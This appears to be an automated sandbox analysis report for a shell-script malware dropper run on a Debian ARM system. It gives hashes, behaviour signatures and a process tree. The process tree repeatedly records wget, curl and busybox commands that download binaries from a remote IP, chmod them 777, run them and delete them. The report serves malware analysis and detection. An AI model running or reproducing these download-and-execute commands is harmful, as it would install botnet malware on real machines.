Analysis
-
max time kernel
49s -
max time network
54s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21-11-2024 08:40
Static task
static1
Behavioral task
behavioral1
Sample
d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a.sh
-
Size
10KB
-
MD5
40acb9bbdc30eee90db1699fc64664f0
-
SHA1
e7f465a62fe2f5943e5c8d4cb0f279f026f536b5
-
SHA256
d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a
-
SHA512
b0d6779c6beb7671facf61f8e5585c55ab7b2b631bac3813ce58bffbffd5993de30f3a8ea75780c9117bbc93739d77c4ef6300ab47e608ee405fb089fc6b6a8d
-
SSDEEP
192:m5Z/77fdck0awgfSex7RRJkIN18JpAEMVA4og7XDu7iuKGuie7MUZEMVW4ogJpWX:wWWNxmGJjB4
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 921 chmod 763 chmod 794 chmod 863 chmod 807 chmod 851 chmod 914 chmod 736 chmod 902 chmod 934 chmod 698 chmod 908 chmod 801 chmod 896 chmod 940 chmod 750 chmod 884 chmod 890 chmod 872 chmod 706 chmod 712 chmod 724 chmod 836 chmod 878 chmod 928 chmod 685 chmod 781 chmod 820 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G 687 fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G /tmp/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI 699 gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI /tmp/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn 707 uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn /tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7 713 lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7 /tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2 725 vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2 /tmp/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p 738 15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p /tmp/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG 751 jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG /tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0 765 ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0 /tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk 783 FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk /tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ 795 S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ /tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji 802 7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji /tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN 808 NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN /tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw 822 EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw /tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV 837 oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV /tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk 853 FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk /tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ 864 S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ /tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0 873 ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0 /tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw 879 EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw /tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV 885 oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV /tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji 891 7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji /tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN 897 NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN /tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7 903 lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7 /tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2 909 vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2 /tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G 915 fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G /tmp/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI 922 gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI /tmp/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn 929 uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn /tmp/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p 935 15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p /tmp/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG 941 jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG -
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G curl File opened for modification /tmp/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI curl File opened for modification /tmp/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn curl File opened for modification /tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ curl File opened for modification /tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN curl File opened for modification /tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji curl File opened for modification /tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7 curl File opened for modification /tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G curl File opened for modification /tmp/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p curl File opened for modification /tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2 curl File opened for modification /tmp/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn curl File opened for modification /tmp/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG curl File opened for modification /tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0 curl File opened for modification /tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji curl File opened for modification /tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ curl File opened for modification /tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw curl File opened for modification /tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7 curl File opened for modification /tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN curl File opened for modification /tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV curl File opened for modification /tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0 curl File opened for modification /tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2 curl File opened for modification /tmp/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p curl File opened for modification /tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk curl File opened for modification /tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw curl File opened for modification /tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk curl File opened for modification /tmp/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG curl File opened for modification /tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV curl File opened for modification /tmp/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI curl
Processes
-
/tmp/d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a.sh/tmp/d91598cbe809a777eda879117574ae48a38a5e5ce754f73085117b25104ef05a.sh1⤵PID:660
-
/bin/rm/bin/rm bins.sh2⤵PID:662
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G2⤵PID:668
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:674
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G2⤵PID:683
-
-
/bin/chmodchmod 777 fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G2⤵
- File and Directory Permissions Modification
PID:685
-
-
/tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G./fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G2⤵
- Executes dropped EXE
PID:687
-
-
/bin/rmrm fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G2⤵PID:688
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI2⤵PID:690
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:693
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI2⤵PID:697
-
-
/bin/chmodchmod 777 gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI2⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI./gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI2⤵
- Executes dropped EXE
PID:699
-
-
/bin/rmrm gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI2⤵PID:702
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn2⤵PID:703
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:704
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn2⤵PID:705
-
-
/bin/chmodchmod 777 uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn2⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn./uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn2⤵
- Executes dropped EXE
PID:707
-
-
/bin/rmrm uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn2⤵PID:708
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU72⤵PID:709
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:710
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU72⤵PID:711
-
-
/bin/chmodchmod 777 lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU72⤵
- File and Directory Permissions Modification
PID:712
-
-
/tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7./lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU72⤵
- Executes dropped EXE
PID:713
-
-
/bin/rmrm lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU72⤵PID:714
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx22⤵PID:715
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:718
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx22⤵PID:722
-
-
/bin/chmodchmod 777 vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx22⤵
- File and Directory Permissions Modification
PID:724
-
-
/tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2./vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx22⤵
- Executes dropped EXE
PID:725
-
-
/bin/rmrm vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx22⤵PID:726
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p2⤵PID:728
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p2⤵PID:735
-
-
/bin/chmodchmod 777 15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p./15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm 15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p2⤵PID:739
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG2⤵PID:740
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG2⤵PID:748
-
-
/bin/chmodchmod 777 jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG./jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG2⤵
- Executes dropped EXE
PID:751
-
-
/bin/rmrm jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG2⤵PID:752
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl02⤵PID:753
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl02⤵PID:761
-
-
/bin/chmodchmod 777 ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl02⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0./ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl02⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl02⤵PID:766
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk2⤵PID:768
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk2⤵PID:776
-
-
/bin/chmodchmod 777 FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk./FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk2⤵
- Executes dropped EXE
PID:783
-
-
/bin/rmrm FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk2⤵PID:784
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ2⤵PID:785
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ2⤵PID:792
-
-
/bin/chmodchmod 777 S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ2⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ./S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ2⤵
- Executes dropped EXE
PID:795
-
-
/bin/rmrm S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ2⤵PID:796
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji2⤵PID:797
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji2⤵PID:800
-
-
/bin/chmodchmod 777 7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji./7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm 7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji2⤵PID:803
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN2⤵PID:804
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN2⤵PID:806
-
-
/bin/chmodchmod 777 NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN./NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN2⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN2⤵PID:809
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw2⤵PID:810
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw2⤵PID:818
-
-
/bin/chmodchmod 777 EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw./EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw2⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV2⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV2⤵PID:833
-
-
/bin/chmodchmod 777 oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV./oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV2⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV2⤵PID:839
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk2⤵PID:842
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk2⤵PID:849
-
-
/bin/chmodchmod 777 FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk./FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm FytH7v1hvSw6Bv2Vne4wW2WsTv0SsLB4Fk2⤵PID:854
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ2⤵PID:855
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ2⤵PID:861
-
-
/bin/chmodchmod 777 S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ./S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm S6BNiXN7oCBA9FcbEvm4sFcAKYQjIIriBJ2⤵PID:865
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl02⤵PID:867
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl02⤵PID:871
-
-
/bin/chmodchmod 777 ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl02⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl0./ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl02⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm ZwgaI4Cl5c8ZrGwX8KfGE86gPvCga3Grl02⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw2⤵PID:877
-
-
/bin/chmodchmod 777 EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw./EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm EdFe9XZDutSnMUEAGiOtQjpfC2dcRx8UNw2⤵PID:880
-
-
